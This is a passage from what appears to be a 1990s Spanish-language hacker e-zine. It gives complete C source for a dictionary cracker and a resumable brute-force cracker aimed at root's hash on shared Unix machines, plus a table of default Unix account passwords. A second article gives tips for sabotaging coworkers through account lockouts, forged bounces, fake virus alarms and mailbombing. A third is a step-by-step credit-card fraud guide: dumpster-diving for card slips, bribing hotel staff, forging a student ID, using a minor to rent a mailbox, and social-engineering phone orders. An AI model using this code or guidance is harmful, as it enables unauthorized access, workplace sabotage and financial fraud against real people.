existen otros que funcionan bajo DOS y que funcionan mas rapido como son:
brute, jack crack, john the ripper, ... Te recomiendo que los consigas.

este programa comprueba que el usuario exista en esa maquina y captura el
mismo la palabra encriptada. Si quieres puedes modificarlo para que le puedas
pasar como parametro la palabra encriptada y que trabaje en tu misma casa.
Tambien acepta cualquier texto ya que el mismo se encarga de deshechar los
caracteres especiales:


------------------------ cortar por aqui -------------------------------------
// Programa que lee palabras de cualquier diccionario o texto y despues de
// encriptarlas las compara.
// Copyright (c) Guybrush


#include <stdio.h>
#include <pwd.h>


char cadena[30];
char clave[30];

struct passwd *pwd;


int desencripta(char *clave, char *archivo)
{
FILE *fichero;

char *crypt(), *resp;
int cont;

if ((fichero = fopen(archivo,"r")) == NULL)
{
printf("\nError al abrir diccionario\n");
exit(0);
}

while (!feof(fichero))
{
cont = 0;

do
{
cadena[cont] = fgetc(fichero);
cont++;
} while ((cadena[cont-1] != '\n') && (cadena[cont-1] != ' ') &&
(cadena[cont-1] != ',') && (cadena[cont-1] != '.') &&
(cadena[cont-1] != ';') && (cadena[cont-1] != ':') &&
(!feof(fichero)));

cadena[cont-1] = '\x0';

resp = crypt(cadena,clave);

if (!strcmp(resp,clave))
{
printf("\a\n\n\n ==> El password es : %s <==\n\n\n",cadena);
fclose(fichero);

return 1;
}
}

fclose(fichero);

return 0;
}


main(int argc, char **argv)
{
int respuesta;
char clave[15];

if (argc == 3)
{
if (!(pwd = getpwnam(argv[1])))
{
printf("\nUsuario desconocido.\n\n");
exit(-1);
}

strcpy(clave,pwd->pw_passwd);

endpwent();

printf("\n\nBuscando palabras en el diccionario ...\n\n");

respuesta = desencripta(clave,argv[2]);

if (respuesta != 1)
printf("\n\n\nPalabra no encontrada en el diccionario.\n\n\n");
}
else
printf("\n\nUsar: %s <usuario> <diccionario donde buscar>\n\n",argv[0]);
}
------------------------ cortar por aqui -------------------------------------

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³6.2-GENERADORES DE PALABRAS³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Podemos dise¤ar tambien un programa que genere todas las combinaciones de
palabras y/o numeros. Esto es muy util para password con menos de 6 caracteres
ya que con 5 ya tarda una eternidad. Ademas hemos de tener en cuenta que un
password admite mayusculas, numeros y caracteres especiales.

He aqui un peque¤o programa el cual uso para dejar residente en la Universidad
ya que esta esta en funcionamiento las 24 horas del dia. Aunque tarde semanas
o meses en encontrar el password, como no esta en mi casa ... :)

------------------------ cortar por aqui -------------------------------------
// Programa que debemos dejar residente con 'nohup' y que busca todas las
// posibles combinaciones para desencriptar un password. Tambien controla
// las interrupciones y hace copias de seguridad ante un kill y cada cierto
// tiempo para poder continuar posteriormente por donde se quedo.
// Copyright (c) Guybrush

#include <stdio.h>
#include <string.h>
#include <pwd.h>
#include <signal.h>
#include <sys/types.h>

#define USUARIO "root" // nombre del usuario
#define DATOS "datos" // fichero temporal donde guarda datos ante un kill
#define SALIDA "salida" // donde graba el password en caso de encontrarlo
/*#define CADENA "abcdefghijklmn¤opqrstuvwxyz"*/
#define CADENA "abcdefghijklmn¤opqrstuvwxyz0123456789"
/*#define CADENA "abcdefghijklmn¤opqrstuvwxyzABCDEFGHIJKLMN¥OPQRSTUVWXYZ"*/
/*#define CADENA "abcdefghijklmn¤opqrstuvwxyzABCDEFGHIJKLMN¥OPQRSTUVW
XYZ0123456789-"*/


struct {
char c1[2];
char c2[3];
char c3[4];
char c4[5];
char c5[6];
char c6[7];
char c7[8];
char c8[9];
} proceso;

struct passwd *pwd;


FILE *fichero;

double contador = 0;

main()
{
void inicializar();
void abandonar();
void uno(), dos(), tres(), cuatro(), cinco(), seis(), siete(), ocho();

char cadena[30];
int longitud = strlen(CADENA);
char clave[15];

signal(SIGTERM,abandonar);

if (!(pwd = getpwnam(USUARIO)))
{
printf("\nUsuario desconocido.\n\n");
exit(-1);
}

strcpy(clave,pwd->pw_passwd);

endpwent();

strcpy(cadena,CADENA);

inicializar(cadena);

uno(longitud, cadena, clave);
dos(longitud, cadena, clave);
tres(longitud, cadena, clave);
cuatro(longitud, cadena, clave);
cinco(longitud, cadena, clave);
seis(longitud, cadena, clave);
siete(longitud, cadena, clave);
ocho(longitud, cadena, clave);

abandonar();
}


void inicializar(char *cadena)
{
int cont;

if ((fichero = fopen(DATOS,"r")) != NULL)
{
fread(&proceso,sizeof(proceso),1,fichero);
fclose(fichero);
}
else
{
if ((fichero = fopen(DATOS,"w")) == NULL)
{
printf("\nError al crear fichero.\n\n");
exit(-1);
}

proceso.c1[0] = cadena[0];
for (cont = 0; cont < 2; cont++)
proceso.c2[cont] = cadena[0];
for (cont = 0; cont < 3; cont++)
proceso.c3[cont] = cadena[0];
for (cont = 0; cont < 4; cont++)
proceso.c4[cont] = cadena[0];
for (cont = 0; cont < 5; cont++)
proceso.c5[cont] = cadena[0];
for (cont = 0; cont < 6; cont++)
proceso.c6[cont] = cadena[0];
for (cont = 0; cont < 7; cont++)
proceso.c7[cont] = cadena[0];
for (cont = 0; cont < 8; cont++)
proceso.c8[cont] = cadena[0];

proceso.c1[1] = '\n';
proceso.c2[2] = '\n';
proceso.c3[3] = '\n';
proceso.c4[4] = '\n';
proceso.c5[5] = '\n';
proceso.c6[6] = '\n';
proceso.c7[7] = '\n';
proceso.c8[8] = '\n';

fwrite(&proceso,sizeof(proceso),1,fichero);
fclose(fichero);
}

proceso.c1[1] = '\x0';
proceso.c2[2] = '\x0';
proceso.c3[3] = '\x0';
proceso.c4[4] = '\x0';
proceso.c5[5] = '\x0';
proceso.c6[6] = '\x0';
proceso.c7[7] = '\x0';
proceso.c8[8] = '\x0';

return;
}


void abandonar()
{
if ((fichero = fopen(DATOS,"w")) == NULL)
{
printf("\nError al crear fichero.\n\n");
exit(-1);
}

proceso.c1[1] = '\n';
proceso.c2[2] = '\n';
proceso.c3[3] = '\n';
proceso.c4[4] = '\n';
proceso.c5[5] = '\n';
proceso.c6[6] = '\n';
proceso.c7[7] = '\n';
proceso.c8[8] = '\n';

fwrite(&proceso,sizeof(proceso),1,fichero);
fclose(fichero);
exit(-1);
}


void copia()
{
if ((fichero = fopen(DATOS,"w")) == NULL)
{
printf("\nError al crear fichero.\n\n");
exit(-1);
}

proceso.c1[1] = '\n';
proceso.c2[2] = '\n';
proceso.c3[3] = '\n';
proceso.c4[4] = '\n';
proceso.c5[5] = '\n';
proceso.c6[6] = '\n';
proceso.c7[7] = '\n';
proceso.c8[8] = '\n';

fwrite(&proceso,sizeof(proceso),1,fichero);
fclose(fichero);

return;
}


int busca(int longitud, char *cadena, char caracter)
{
int posicion;

for (posicion = 0; posicion < longitud; posicion++)
if (caracter == cadena[posicion])
return posicion;

return 0;
}


void encontrado(char *palabra)
{
FILE *fichero2;

printf("\a\a\a");

if ((fichero2 = fopen(SALIDA,"w")) == NULL)
{
printf("\nError al crear fichero.\n\nClave : %s",palabra);
exit(-1);
}

fprintf(fichero2,palabra);
fclose(fichero2);

return;
}


void uno(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont;
int p0 = busca(longitud,cadena,proceso.c1[0]);

for (cont = p0; cont != longitud; cont++)
{
proceso.c1[0] = cadena[cont];
desencripta = crypt(proceso.c1,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c1);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

return;
}


void dos(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2;
int p0 = busca(longitud,cadena,proceso.c2[0]);
int p1 = busca(longitud,cadena,proceso.c2[1]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c2[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c2[1] = cadena[cont2];
desencripta = crypt(proceso.c2,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c2);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p1 = 0;
}

return;
}


void tres(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2, cont3;
int p0 = busca(longitud,cadena,proceso.c3[0]);
int p1 = busca(longitud,cadena,proceso.c3[1]);
int p2 = busca(longitud,cadena,proceso.c3[2]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c3[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c3[1] = cadena[cont2];

for (cont3 = p2; cont3 < longitud; cont3++)
{
proceso.c3[2] = cadena[cont3];
desencripta = crypt(proceso.c3,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c3);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p2 = 0;
}

p1 = 0;
}

return;
}


void cuatro(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2, cont3, cont4;
int p0 = busca(longitud,cadena,proceso.c4[0]);
int p1 = busca(longitud,cadena,proceso.c4[1]);
int p2 = busca(longitud,cadena,proceso.c4[2]);
int p3 = busca(longitud,cadena,proceso.c4[3]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c4[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c4[1] = cadena[cont2];

for (cont3 = p2; cont3 < longitud; cont3++)
{
proceso.c4[2] = cadena[cont3];

for (cont4 = p3; cont4 < longitud; cont4++)
{
proceso.c4[3] = cadena[cont4];
desencripta = crypt(proceso.c4,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c4);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p3 = 0;
}

p2 = 0;
}

p1 = 0;
}

return;
}


void cinco(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2, cont3, cont4, cont5;
int p0 = busca(longitud,cadena,proceso.c5[0]);
int p1 = busca(longitud,cadena,proceso.c5[1]);
int p2 = busca(longitud,cadena,proceso.c5[2]);
int p3 = busca(longitud,cadena,proceso.c5[3]);
int p4 = busca(longitud,cadena,proceso.c5[4]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c5[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c5[1] = cadena[cont2];

for (cont3 = p2; cont3 < longitud; cont3++)
{
proceso.c5[2] = cadena[cont3];

for (cont4 = p3; cont4 < longitud; cont4++)
{
proceso.c5[3] = cadena[cont4];

for (cont5 = p4; cont5 < longitud; cont5++)
{
proceso.c5[4] = cadena[cont5];
desencripta = crypt(proceso.c5,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c5);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p4 = 0;
}

p3 = 0;
}

p2 = 0;
}

p1 = 0;
}

return;
}


void seis(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2, cont3, cont4, cont5, cont6;
int p0 = busca(longitud,cadena,proceso.c6[0]);
int p1 = busca(longitud,cadena,proceso.c6[1]);
int p2 = busca(longitud,cadena,proceso.c6[2]);
int p3 = busca(longitud,cadena,proceso.c6[3]);
int p4 = busca(longitud,cadena,proceso.c6[4]);
int p5 = busca(longitud,cadena,proceso.c6[5]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c6[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c6[1] = cadena[cont2];

for (cont3 = p2; cont3 < longitud; cont3++)
{
proceso.c6[2] = cadena[cont3];

for (cont4 = p3; cont4 < longitud; cont4++)
{
proceso.c6[3] = cadena[cont4];

for (cont5 = p4; cont5 < longitud; cont5++)
{
proceso.c6[4] = cadena[cont5];

for (cont6 = p5; cont6 < longitud; cont6++)
{
proceso.c6[5] = cadena[cont6];
desencripta = crypt(proceso.c6,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c6);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p5 = 0;
}

p4 = 0;
}

p3 = 0;
}

p2 = 0;
}

p1 = 0;
}

return;
}


void siete(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2, cont3, cont4, cont5, cont6, cont7;
int p0 = busca(longitud,cadena,proceso.c7[0]);
int p1 = busca(longitud,cadena,proceso.c7[1]);
int p2 = busca(longitud,cadena,proceso.c7[2]);
int p3 = busca(longitud,cadena,proceso.c7[3]);
int p4 = busca(longitud,cadena,proceso.c7[4]);
int p5 = busca(longitud,cadena,proceso.c7[5]);
int p6 = busca(longitud,cadena,proceso.c7[6]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c7[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c7[1] = cadena[cont2];

for (cont3 = p2; cont3 < longitud; cont3++)
{
proceso.c7[2] = cadena[cont3];

for (cont4 = p3; cont4 < longitud; cont4++)
{
proceso.c7[3] = cadena[cont4];

for (cont5 = p4; cont5 < longitud; cont5++)
{
proceso.c7[4] = cadena[cont5];

for (cont6 = p5; cont6 < longitud; cont6++)
{
proceso.c7[5] = cadena[cont6];

for (cont7 = p6; cont7 < longitud; cont7++)
{
proceso.c7[6] = cadena[cont7];
desencripta = crypt(proceso.c7,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c7);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p6 = 0;
}

p5 = 0;
}

p4 = 0;
}

p3 = 0;
}

p2 = 0;
}

p1 = 0;
}

return;
}


void ocho(int longitud, char *cadena, char *clave)
{
void encontrado();
void copia();

char *crypt(), *desencripta;

int cont, cont2, cont3, cont4, cont5, cont6, cont7, cont8;
int p0 = busca(longitud,cadena,proceso.c8[0]);
int p1 = busca(longitud,cadena,proceso.c8[1]);
int p2 = busca(longitud,cadena,proceso.c8[2]);
int p3 = busca(longitud,cadena,proceso.c8[3]);
int p4 = busca(longitud,cadena,proceso.c8[4]);
int p5 = busca(longitud,cadena,proceso.c8[5]);
int p6 = busca(longitud,cadena,proceso.c8[6]);
int p7 = busca(longitud,cadena,proceso.c8[7]);

for (cont = p0; cont < longitud; cont++)
{
proceso.c8[0] = cadena[cont];

for (cont2 = p1; cont2 < longitud; cont2++)
{
proceso.c8[1] = cadena[cont2];

for (cont3 = p2; cont3 < longitud; cont3++)
{
proceso.c8[2] = cadena[cont3];

for (cont4 = p3; cont4 < longitud; cont4++)
{
proceso.c8[3] = cadena[cont4];

for (cont5 = p4; cont5 < longitud; cont5++)
{
proceso.c8[4] = cadena[cont5];

for (cont6 = p5; cont6 < longitud; cont6++)
{
proceso.c8[5] = cadena[cont6];

for (cont7 = p6; cont7 < longitud; cont7++)
{
proceso.c8[6] = cadena[cont7];

for (cont8 = p7; cont8 < longitud; cont8++)
{
proceso.c8[7] = cadena[cont8];
desencripta = crypt(proceso.c8,clave);
if (!strcmp(desencripta,clave))
{
encontrado(proceso.c8);
abandonar();
}

if ((contador++) == 60000)
{
copia();
contador = 0;
}
}

p7 = 0;
}

p6 = 0;
}

p5 = 0;
}

p4 = 0;
}

p3 = 0;
}

p2 = 0;
}

p1 = 0;
}

return;
}
------------------------ cortar por aqui -------------------------------------

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 7-CUENTAS UNIX POR DEFECTO ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Los sistemas Unix suelen tener varias cuentas por defecto. Cuentas que algunos
administradores algo lamers no quitan o protegen. Estas son las primeras que
debemos a¤adir a nuestro diccionario ... por si acaso :)

login passwd
----------------------
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 8-DESPEDIDA ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Esto es todo por hoy. espero que te halla servido de ayuda y que me escribas
si tienes alguna duda. Tambien me gustaria que me corrigierais si es que me
he confundido en algo.

Podeis usar y distribuir estos 3 programas pero con la condicion de que dejeis
el copyright.

Un saludo.

ú-= Guybrush =-ú

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Durante la creacion de esta revista muchos sistemas han sido da¤ados ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

* COMO DESTRUIR A LA COMPETENCIA *
...En un sistema de redes...
por Mr.X

Si en tu trabajo todos los empleados o la mayoria trabajan delante de una
terminal seguramente usar la red de la oficina en ocasiones puede ser un
dolor de cabeza sobre todo si hay por ahi en algun cubiculo un "chico listo"
que siempre se salga con la suya al momento de usar el sistema de la Cia.
Para derrotar al chico listo y a los demas compa¤eros de trabajo en nuestro
camino a la cima basta con hacer caso a uno de estos sencillos tips.

Como ser el primero en usar la impresora de la red
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Estas terminando tu trabajo de 25 hojas y necesitas entregarlo en menos de
5 minutos. File - Print y te vas al piso de abajo donde esta la impresora
de la red. En eso ­QUE! ahi estan enfrente de ti otras 7 personas esperando
sus trabajos y resulta que el documento mas peque¤o es de 30 hojas. En ese
debes regresar a tu estacion de trabajo Windows y abrir el monitor de
impresion. Selecciona los trabajos enfrente de ti y presiona "Pause Printing"
asi los trabajos seran pausados y el tuyo permanecera activo. Cuando termine
de imprimir tu trabajo no olvides de presionar "resume printing" para que
nadie sospeche.

Contrataca a los metiches
^^^^^^^^^^^^^^^^^^^^^^^^^
No hay peor escoria en este mundo que aquellas personas que pegan un
"receipt notice" en sus mensajes. Esta feature permite a la persona que
envio el mensaje saber cuando lo abriste para leerlo pero que diablos! ¨ por
que alguien debe saber a que horas lees tu correo ? Lo que debes hacer es
contratacar.
No abras ningun mensaje con una "receipt notice" lo que necesitas hacer es
usar otra feature de tu programa de comunicaciones "forward" y manda ese
mensaje -sin abrir- a tu direccion. Cuando llegue a tu direccion la nota de
recibo sera eliminada y podras leerlo con privacidad.
La sorpresa que se llevara el lamer que haya tratado de espiar en tu
privacidad cuando reciba respuesta sin antes recibir el aviso de que has
leido su mensaje! Esto debe aplicarse al siguiente consejo.

Protege tu fin de semana
^^^^^^^^^^^^^^^^^^^^^^^^
Es viernes y estas a punto de ir a casa. El trafico te espera pero tambien
una cena o una chica en la disco que invitaste a salir del otro lado de la
ciudad. Antes de irte revisas tu correo por ultima vez y encuentras un
mensaje de tu jefe solicitandote todo un resumen de actividades del mes!
Ese trabajo podria llevarte todo el fin de semana y tendrias que estropear
tus planes. Oh no contigo ni el jefe puede, inmediatamente mandas el mensaje
a una direccion inexistente para que rebote. Despues de unos segundos tendras
un mensaje con un error marcado. Copia la informacion del encabezado del
mensaje de tu jefe al mensaje con el error a un mensaje nuevo. Tambien copia
el subject y antes de salir de la oficina presiona "send". Ahora quien podra
culparte por no hacer lo que un mensaje que nunca recibiste decia ??

Roba tiempo de tu competencia
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Si tienes que robar un poco de tiempo a tu "compa¤ero" de trabajo y sabes
que necesita entregar un reporte entonces todo lo que tienes que hacer es
llegar temprano a tu trabajo y usando una terminal de la LAN como la de la
impresora o una estacion de trabajo extra escribe el login de tu competencia
y escribe passwords erroneos una y otra vez hasta que aparezca el mensaje
"Network access denied, contact your system administrator". Ahora has lo
mismo con la cuenta de tu jefe y otros 2 compa¤eros para evitar sospechas.

Panico en la oficina
^^^^^^^^^^^^^^^^^^^^
Tu presentacion la preparaste desde hace dias y estas a punto de apantallar
a tus jefes. En eso alguien intentando sabotear tu presentacion manda un
mensaje a todos los del edificio mencionando un "nuevo virus" en su disco
que se esta comiendo todos sus documentos urge un especialista se alcanza a
leer al final del mensaje. Tu jefe -que nada sabe sobre virus- entra en
panico total y ordena apagar el sistema hasta que los tecnicos revisen la
red. Tu presentacion ha sido exitosamente saboteada al no poder usar ninguna
de las computadoras de la compa¤ia.

De viaje y en aprietos
^^^^^^^^^^^^^^^^^^^^^^
Tu archienemigo sale de viaje y lleva consigo su leal notebook que necesita
para estar conectado con la oficina -y con el jefe-. Es necesario que
prepares tu estrategia desde la oficina con un archivo de 10 a 15 megas.
Mandalo como attachment a la direccion de tu enemigo para bloquearlo del
jefe. Pero como unos programas dejan que no reciba los attachments
complicando tu estrategia has decidido mandar otros 10 megas en el cuerpo del
mensaje !! Asegurate de que no exista manera de rastrear el mensaje a tu
direccion y es todo lo que necesitas para mover a la competencia.

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð http://www.geocities.com/Baja/4426 - Mas Hits que Michael Jackson! - ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]


ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÛÛÛÛÛÛÜ ÛÛÛÛÛÛÜ ÞÛÛÝ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
ÛÛ ÛÛÜÜÜÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÜÜÜ
ÛÛ ÛÛßßßÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ
ßÛÛÛÛÛß ÛÛ ÛÛ ÛÛ ßÛÛ ÛÛÛÛÛÛß ÞÛÛÝ ÛÛ ÛÛ ßÛÛÛÛÛß
@ Como obtener HARDWARE gratuito @
~~~~~~~~
Texto +original+ de Raretrip dedicado a Visa y Mastercard

Con las tarjetas de credito podemos ordenar codigos de registro o passwords
para entrar a sitios con material pornografico y pedirlos a una cuenta de
correo anonima pero que pasa cuando queremos obtener hardware? Quiero darles
una idea de como obtener equipo para nuestra computadora, videos de musica,
cassettes o regalos para la abuela y novia sin tener que gastar un peso ni
arriesgar nuestra libertad.

Para empezar a planear una compra usando la informacion de una tarjeta de
credito primero necesitas conseguir los datos de la cuenta. Esto es lo mas
importante de todo. Para obtenerla puedes usar el sistema de computo de un
hotel o restaurant donde casi siempre tienen los numeros de tarjeta y
direcciones de los due¤os disponibles en cualquier terminal. Si conoces
alguien que trabaje en la recepcion de un hotel ofrecele dinero por la
informacion en ocasiones puedes hacer esto sin conocer al trabajador por
medio de un amigo o conocido.
El problema de conseguir los numeros de tarjeta de las copias carbon es que
no se consigue la direccion o numero telefonico aunque esto tambien tiene
una solucion y se conoce como: directorio telefonico.
Si te diriges a la zona turistica de tu ciudad y recojes una o dos bolsas
de basura seguramente encontraras mas de 20 hojas amarillas o copias carbon
con la informacion basica del due¤o de la tarjeta. La informacion que se
obtiene de una copia amarilla de la tarjeta es:

Nombre:
Numero de Cuenta:
Fecha de Expiracion:
Tipo de tarjeta: Visa o Mastercard de acuerdo a los digitos.

Esta es toda la informacion necesaria para hacer una compra en internet de
software. Pero para comprar digamos un modem o algo mas grande es necesaria
mas informacion para que parezca una compra legitima. La informacion
necesaria para hacer una compra por telefono o en internet de Hardware es:

Nombre: \
Numero de Cuenta: \_____ Estos datos son faciles de conseguir.
Fecha de Expiracion: /
Tipo de tarjeta: /
Direccion: \
Codigo Postal: \_____ 4 datos mas...eso significa mas trabajo!
Ciudad: /
Pais: /

Asi que ya conseguiste los primero 4 datos buscando entre la basura de un
restaurant o alguna tienda . . . ahora que ? Tienes dos opciones una mas
facil que la otra:
1) Comprar codigos de software.
2) Comprar cualquier cosa que quieras.
Si te decides por la primera opcion puedes dirigirte a cualquier tienda en
internet y comprar los codigos de cualquier programa shareware pero si lo
que quieres es la segunda opcion no uses la informacion para ninguna compra
y espera hasta que consigas toda la informacion necesaria.
RECUERDA: No uses dos veces la misma tarjeta o direccion!

Para conseguir la direccion simplemente usa alguna guia telefonica o base
de datos como las que se pueden encontrar en American Online o Compuserve.
Cuando tengas la direccion puedes deducir el codigo postal, la ciudad y el
pais con facilidad. Solo existe un problema, que pasaria si no tienes acceso
a las bases de datos? Pues adios compra. Por eso es importante que tengas
contactos en hoteles o restaurantes ya que ellos pueden conseguir toda la
informacion en sus computadoras. Otra cosa que puedes hacer es conseguir
numeros de tarjetas locales asi la direccion estara disponible en tu guia
de telefonos local. Para conseguir numeros de tarjeta de personas que vivan
en tu localidad todo es tan simple como visitar el basurero de una tienda
indispensable para los locales y no una para los turistas.
Supongamos que encuentras la direccion donde vive el due¤o de la tarjeta en
tu guia local y ahora necesitas su codigo postal verdad? Pues hablale por
telefono y preguntale! O visita tu oficina postal y ahi investiga en esos
utiles mapas con los codigos que tienen ellos :-)
Ahora que tienes los 8 datos necesarios es hora de pasar a...

.Conseguir la direccion destino

De nada te servira pedir cualquier cosa si va a terminar en la casa del due¤o
de la tarjeta por eso necesitas una direccion donde puedan enviarte lo que
pidas pero como hacerlo? SIMPLE! Si vives en cualquier estado de Mexico esta
es la parte mas facil. Consigue a un menor de edad (14 a 15 a¤os) y crea una
credencial falsa de estudiante usando un scanner de fotografias y una
impresora a color con buena resolucion (disponibles en cualquier negocio de
dise¤o grafico). Ahora lo necesario antes de ir a tu oficina de correos local
es una credencial con un nombre inexistente de alguna secundaria o prepa
local y 50 pesos para pagar la cuota por un apartado postal por el resto del
a¤o y una actitud segura. Puedes pedir a un amigo de unos 15 a¤os que te
haga el favor de comprar un apartado postal, si acepta entonces falsifica una
credencial y cambia el numero de matricula. El costo aproximado de la I.D.
falsa es de 25 pesos (scaneado e impresion). Si tu eres o pareces menor de
edad entonces tu puedes ir a tu oficina de correos con la credencial y 50
pesos (eso cuesta un apartado postal). En menos de 25 minutos tendras ya la
llave de un apartado postal a nombre de alguien inexistente y 50 pesos menos.
Si te dan problemas los de la oficina de correos (nunca lo hacen) di que te
iniciaste en un programa de correspondencia y el correo no llega hasta tu
colonia. Inmediatamente te daran el apartado (pagando desde luego) y te
pediran una identificacion que puede ser una credencial escolar que debe ser
modificada preferentemente ya que anotaran el nombre y numero de matricula
pero no guardan copia de la foto o la credencial.
Ahora ya tienes una direccion donde podras recibir tu pedido...perfecto!

.Hacer la orden

Primero necesitas saber que vas a pedir. Esto puedes hacerlo por medio de
catalogos, programas de television o tiendas en internet. Las tiendas en
internet debes buscarlas usando una maquina de busqueda como www.infoseek.com
y busca "tienda electronica" o "plaza virtual". Ya que hayas encontrado la
tienda o negocio donde vayas a realizar la compra debes hacer la llamada o
llenar la forma en caso de ser una compra en internet.
Como antes se ha dicho es SUPER NECESARIO EL ENVIO INMEDIATO de lo que pidas.
Asegurate de que el pedido sea enviado cuando mucho al dia siguiente por
paqueteria aerea. Este es realmente el unico problema ya que la mayoria de
las tiendas en linea piden de 3 a 4 semanas para enviar el paquete. Una forma
de contrarrestar esto es por medio de una compra telefonica que es lo que
recomendaria mas. Antes de dar la informacion de la tarjeta a la operadora
asegurate de preguntar sobre paqueteria aerea y preguntar cuanto costara
casi siempre es 15% o 20% mas del precio de lo que pidas. Acepta, dales la
informacion y cuelga.

Si por algun motivo te piden un numero telefonico no dudes en darles un
numero que siempre de tono de ocupado o alguno desconectado. Por ahi me
entere de que en ocasiones piden mandar una copia de la tarjeta de credito
o de la ficha de deposito pero aun no me he encontrado ninguna compa¤ia que
lo pida excepto uno que otro proveedor de espacio web. En geocities con la
informacion de la tarjeta puedes conseguirte 5 megas!

Decirte COMO hacer la llamada no tiene caso es tan facil como seguirle la
corriente a la operadora y darle los datos -EXCEPTO- cuando pregunta
¨ Desea que su pedido sea enviado a la direccion donde se cobra la tarjeta ?
Ahi es donde debemos mostrar nuestro conocimiento de ingenieria social y
decir algo como:

"No, es un regalo para mi esposa(o)/hermano(a)/hijo(a) y no deseo que se de
cuenta cuando llegue el paquete ¨podria enviarlo al apartado postal #0000?"

O tambien:

"No, estoy usando la tarjeta de la compa¤ia y preferiria que llegara a..."

Otra vez, *NO* ofrezcas la informacion de la tarjeta hasta que te aseguren
que pueden enviar el paquete en menos de 2 a 5 dias. Entre mas tiempo se
tarde en llegar algo, mas probabilidad existe de que te agarren.

.Recoger la mercancia

En un articulo anterior que aparecio en esta revista se menciona este paso
